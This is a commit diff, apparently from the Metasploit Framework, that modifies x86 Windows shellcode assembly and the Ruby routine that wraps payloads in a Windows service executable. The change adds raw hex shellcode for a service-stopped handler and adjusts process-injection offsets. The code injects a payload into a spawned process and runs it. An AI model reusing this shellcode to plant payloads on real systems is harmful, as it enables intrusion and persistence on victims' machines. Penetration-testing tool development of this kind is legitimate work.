Improve service_block with service_stopped block to cleanly terminate service

Author: Florian Gaultier

external/source/shellcode/windows/x86/src/block/block_create_remote_process.asm

@@ -50,7 +50,7 @@ pop edx
 
 mov edi, eax
 mov ecx, [esi]
-lea edx, [edx+0x47] ;pointer on the next shellcode
+add dword edx, 0x112247   ;pointer on the next shellcode
 push esp
 push 0x00001000	;Next Shellcode Size
 push edx		;
@@ -79,8 +79,4 @@ call ebp 		;call CloseHandle()
 mov ecx, [esi+0x4]
 push ecx
 push 0x528796C6
-call ebp 		;call CloseHandle()
-
-push edi
-push 0x56A2B5F0
-call ebp		;call ExitProcess(0)
+call ebp 		;call CloseHandle()

external/source/shellcode/windows/x86/src/single/single_service_stuff.asm

@@ -14,4 +14,9 @@
 start:                   ;
   pop ebp                ; pop off the address of 'api_call' for calling later.
 %include "./src/block/block_service.asm"
-%include "./src/block/block_create_remote_process.asm"
+%include "./src/block/block_create_remote_process.asm"
+%include "./src/block/block_service_stopped.asm"
+
+push edi
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)

lib/msf/util/exe.rb

@@ -345,6 +345,9 @@ def self.to_winpe_only(framework, code, opts={}, arch="x86")
       characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
 
       if (virtualAddress...virtualAddress+sizeOfRawData).include?(pe.hdr.opt.AddressOfEntryPoint)
+        if sizeOfRawData<code.length
+          raise RuntimeError, "The EXE::Template doesn't contain enough place to write the payload."
+        end
         # put this section writable
         characteristics |= 0x8000_0000
         newcharacteristics = [characteristics].pack('L')
@@ -518,12 +521,22 @@ def self.to_win32pe_service(framework, code, opts={})
       precode_size = 0xc6
       svcmain_code_offset = precode_size + pushed_service_name.length
 
-      precode_size += 0x06
+      precode_size = 0xcc
       hash_code_offset = precode_size + pushed_service_name.length
 
-      precode_size -= 0x0d
+      precode_size = 0xbf
       svcctrlhandler_code_offset = precode_size + pushed_service_name.length
 
+      code_service_stopped =
+        "\xE8\x00\x00\x00\x00\x5F\xEB\x07\x58\x58\x58\x58\x31\xC0\xC3" +
+         pushed_service_name+"\x89\xE1\x8D\x47\x03\x6A\x00" +
+        "\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5\x6A\x00\x6A\x00\x6A\x00\x6A" +
+        "\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x10\x89\xE1\x6A\x00\x51\x50\x68" +
+        "\xC6\x55\x37\x7D\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
+
+      precode_size = 0x42
+      shellcode_code_offset = code_service_stopped.length + precode_size
+
       # code_service could be encoded in the future
       code_service =
         "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
@@ -549,12 +562,13 @@ def self.to_win32pe_service(framework, code, opts={})
         "\x6C\x6C\x33\x32\x68\x72\x75\x6E\x64\x89\xE1\x56\x50\x57\x57\x6A" +
         "\x44\x57\x57\x57\x51\x57\x68\x79\xCC\x3F\x86\xFF\xD5\x8B\x0E\x6A" +
         "\x40\x68\x00\x10\x00\x00\x68"+[code.length].pack('<I')+"\x57\x51\x68\xAE\x87" +
-        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x8D\x52" +
-        "\x47\x54\x68"+[code.length].pack('<I')+"\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
+        "\x92\x3F\xFF\xD5\xE8\x00\x00\x00\x00\x5A\x89\xC7\x8B\x0E\x81\xC2" +
+         [shellcode_code_offset].pack('<I')+"\x54\x68"+[code.length].pack('<I') +
+        "\x52\x50\x51\x68\xC5\xD8\xBD\xE7\xFF" +
         "\xD5\x31\xC0\x8B\x0E\x50\x50\x50\x57\x50\x50\x51\x68\xC6\xAC\x9A" +
         "\x79\xFF\xD5\x8B\x0E\x51\x68\xC6\x96\x87\x52\xFF\xD5\x8B\x4E\x04" +
-        "\x51\x68\xC6\x96\x87\x52\xFF\xD5\x57\x68\xF0\xB5\xA2\x56\xFF\xD5"
-
+        "\x51\x68\xC6\x96\x87\x52\xFF\xD5" +
+         code_service_stopped
 
       return to_winpe_only(framework, code_service + code, opts)
     end